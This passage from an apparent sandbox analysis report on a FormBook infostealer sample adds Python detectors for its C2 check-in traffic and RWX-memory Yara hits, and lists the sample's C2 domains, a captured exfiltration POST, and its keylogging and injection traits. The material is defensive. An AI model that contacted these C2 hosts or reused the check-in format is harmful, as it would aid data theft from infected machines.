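BODY_RE = re.compile(r"^[A-Za-z0-9]{1,8}=[A-Za-z0-9_()~-]{64,}$")
MIN_EXFIL_BYTES = 4096  # ASSUMED threshold; tune per environment


def parse_http_request(raw):
    """Split a raw CRLF-delimited HTTP/1.1 request into method, path, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def formbook_indicators(req):
    """Heuristic reasons a parsed request resembles a Formbook check-in (empty = none)."""
    if req["method"] != "POST":
        return []
    h, reasons = req["headers"], []
    if (h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and BODY_RE.match(req["body"])):
        reasons.append("body is a single opaque form token")
    origin, referer, host = h.get("origin", ""), h.get("referer", ""), h.get("host", "")
    if origin and urlsplit(origin).netloc == host and referer == origin + req["path"]:
        reasons.append("Origin/Referer echo the request's own host and path")
    if "Trident/7.0" in h.get("user-agent", "") and h.get("connection", "").lower() == "close":
        reasons.append("IE11 Trident user agent with Connection: close")
    declared = int(h.get("content-length") or 0)  # header may exceed captured body
    if max(declared, len(req["body"])) >= MIN_EXFIL_BYTES:
        reasons.append("large POST body")
    return reasons


def shared_post_paths(reqs):
    """Paths POSTed to more than one host; Formbook cycles decoy domains with one path."""
    hosts = defaultdict(set)
    for r in reqs:
        if r["method"] == "POST":
            hosts[r["path"]].add(r["headers"].get("host", ""))
    return {p: sorted(hs) for p, hs in hosts.items() if len(hs) > 1}


# Constructed sample log (see lead-in). Header template copied from the report.
C2_HEADERS = (
    "Connection: close\r\nContent-Length: {length}\r\nCache-Control: no-cache\r\n"
    "Origin: http://{host}\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    "Referer: http://{host}/ez3/\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\n"
)
SAMPLE_REQUESTS = [
    # 1: the report's request; body is the captured prefix only
    "POST /ez3/ HTTP/1.1\r\nHost: www.lcpierpontphotography.com\r\n"
    + C2_HEADERS.format(host="www.lcpierpontphotography.com", length=153125) + "\r\n"
    + "dL3=gDzdMAmUJDNCK-s2NQOWCIRoc7PIeqdPWEQ5pBxvu9MZ32XPjll5uaQo70KVYUaG4UT76X7fDUX2"
      "~bncyaaIEOu1YfBz5aworViSr-5zCALpKTH4gGTGyxN9GCmHZhoC44pu89EQPmBzpVFLrIolUZnNJDV",
    # 2: hypothetical request to the other /ez3/ host; token and length are made up
    "POST /ez3/ HTTP/1.1\r\nHost: www.allixanes.com\r\n"
    + C2_HEADERS.format(host="www.allixanes.com", length=4113) + "\r\n"
    + "dL3=" + "xK2~" * 20,
    # 3: ordinary login form for contrast
    "POST /login HTTP/1.1\r\nHost: intranet.example\r\nUser-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
    "username=alice&password=hunter2",
]

if __name__ == "__main__":
    parsed = [parse_http_request(r) for r in SAMPLE_REQUESTS]
    for req in parsed:
        print(req["headers"]["host"], req["path"], formbook_indicators(req) or "clean")
    print("paths shared across hosts:", shared_post_paths(parsed))
```

Each indicator is weak on its own (plenty of legitimate sites post opaque tokens from an IE11 client), so treat the list length as a score and let the cross-host path correlation carry the most weight; a single path hit on several unrelated domains inside one session is rarely benign.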
 Urls found in memory or binary data
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
 Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com
 Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com/ez3/
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
 Source: explorer.exe, 00000004.00000000.889874232.0000000007B92000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC:
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

 Contains functionality to retrieve information about pressed keystrokes
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00449F24 GetKeyboardState, 0_2_00449F24
 Creates a DirectInput object (often for capturing keystrokes)
 Source: sdv88p2lg.exe, 0000000E.00000002.1485735250.0000000000790000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
 Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
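The "Urls found in memory or binary data" list earlier and the Yara match list above share one identifier scheme, <pid>.<phase>.<dump id>.<base address>.<protection>.<type>.sdmp, and only the UNPACKEDPE entries (3.2.xg28sL5JDm.exe.400000.0.unpack, 15.1.sdv88p2lg.exe.400000.0.raw.unpack) tie a pid to a process name. Read together they separate noise from signal: the font-vendor URLs come from read-only (0x02) memory of explorer.exe, the Formbook URL sits in read-write (0x04) memory of svchost.exe, and the Yara hits at 0x400000 in pids 3, 5 and 15 are in 0x40 (PAGE_EXECUTE_READWRITE) regions, which is what the process-hollowing and "changes PE section rights" signatures describe. The script below is an added example, not tooling from the report: it parses both entry forms, groups them by pid and flags pids whose Yara hits fall in writable and executable memory. Treating the fifth field as a Win32 PAGE_* value and the second as a before/after-execution phase is my reading of the Joe Sandbox naming and is marked as an assumption in the code; the sixth field is kept raw. The input lines are a constructed subset copied from the two lists in this report.

```python
"""Group Joe Sandbox memory-dump references by pid; flag RWX Yara hits (added example)."""
import re
from collections import defaultdict

# <pid>.<phase>.<dump id>.<base address>.<protection>.<type>.sdmp
# ASSUMPTION: field 5 is a Win32 PAGE_* protection and field 2 a before/after
# execution phase; field 6 is kept raw because the report does not define it.
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<mtype>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)
# <pid>.<phase>.<process>.<base>.<n>[.raw].unpack  (UNPACKEDPE entries)
UNPACK_RE = re.compile(
    r"(?P<pid>\d+)\.(?P<phase>\d+)\.(?P<process>[^\s,]+?\.exe)\."
    r"(?P<base>[0-9a-fA-F]+)\.\d+(?:\.raw)?\.unpack"
)
PROC_RE = re.compile(r"^\s*Source:\s*(?P<process>[^\s,]+\.exe),")
URL_RE = re.compile(r"String found in binary or memory:\s*(?P<url>\S+)")

PAGE_PROTECT = {  # winnt.h values
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}


def parse_sdmp(text):
    """Fields of the first .sdmp identifier in text, or None if there is none."""
    m = SDMP_RE.search(text)
    if not m:
        return None
    prot = int(m["protect"], 16) & 0xFF  # drop PAGE_GUARD / PAGE_NOCACHE modifiers
    return {"pid": int(m["pid"], 16), "phase": int(m["phase"], 16),
            "base": int(m["base"], 16), "mtype": int(m["mtype"], 16),
            "protect": PAGE_PROTECT.get(prot, hex(prot)),
            "rwx": prot in EXECUTABLE and prot in WRITABLE}


def parse_report_line(line):
    """One 'Source: ...' entry from the URL-strings or Yara list -> record, or None."""
    rec = parse_sdmp(line)
    if rec is not None:
        m = PROC_RE.match(line)          # URL entries name the process up front
        rec["process"] = m["process"] if m else None
    else:
        m = UNPACK_RE.search(line)       # unpacked-PE entries carry the name inline
        if not m:
            return None
        rec = {"pid": int(m["pid"]), "phase": int(m["phase"]), "base": int(m["base"], 16),
               "mtype": None, "protect": None, "rwx": False, "process": m["process"]}
    rec["yara"] = "Yara match" in line
    m = URL_RE.search(line)
    rec["url"] = m["url"] if m else None
    return rec


def summarize(lines):
    """Per-pid view: process, Yara hits (total / in RWX memory), protections, URL hits."""
    by_pid = defaultdict(lambda: {"process": None, "yara_total": 0, "yara_rwx": 0,
                                  "protections": set(), "urls": []})
    for line in lines:
        rec = parse_report_line(line)
        if rec is None:
            continue
        e = by_pid[rec["pid"]]
        if rec["process"]:
            e["process"] = rec["process"]
        if rec["protect"]:
            e["protections"].add(rec["protect"])
        if rec["yara"]:
            e["yara_total"] += 1
            e["yara_rwx"] += int(rec["rwx"])
        if rec["url"]:
            e["urls"].append((rec["url"], rec["protect"]))
    return dict(by_pid)


def rwx_payload_pids(summary):
    """Pids with a Yara hit in writable+executable memory: an unpacked payload lives there."""
    return sorted(pid for pid, e in summary.items() if e["yara_rwx"] > 0)


# Constructed subset of the entries in this report.
REPORT_LINES = [
    "Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp "
    "String found in binary or memory: http://www.fonts.com",
    "Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp "
    "String found in binary or memory: http://www.allixanes.com/ez3/",
    "Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE",
]

if __name__ == "__main__":
    summary = summarize(REPORT_LINES)
    for pid in sorted(summary):
        e = summary[pid]
        print(f"pid {pid:>2} {e['process'] or '?':<16} yara={e['yara_total']} "
              f"rwx={e['yara_rwx']} prot={sorted(e['protections'])} urls={e['urls']}")
    print("payload in RWX memory:", rwx_payload_pids(summary))
```

On the full lists the same grouping shows svchost.exe (pid 5) holding the payload at 0x400000 in RWX memory although it was never the submitted sample, which is the memory-side view of the "System process connects to network (likely due to code injection)" and "Queues an APC in another process" signatures.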

### System Summary:

 Detected FormBook malware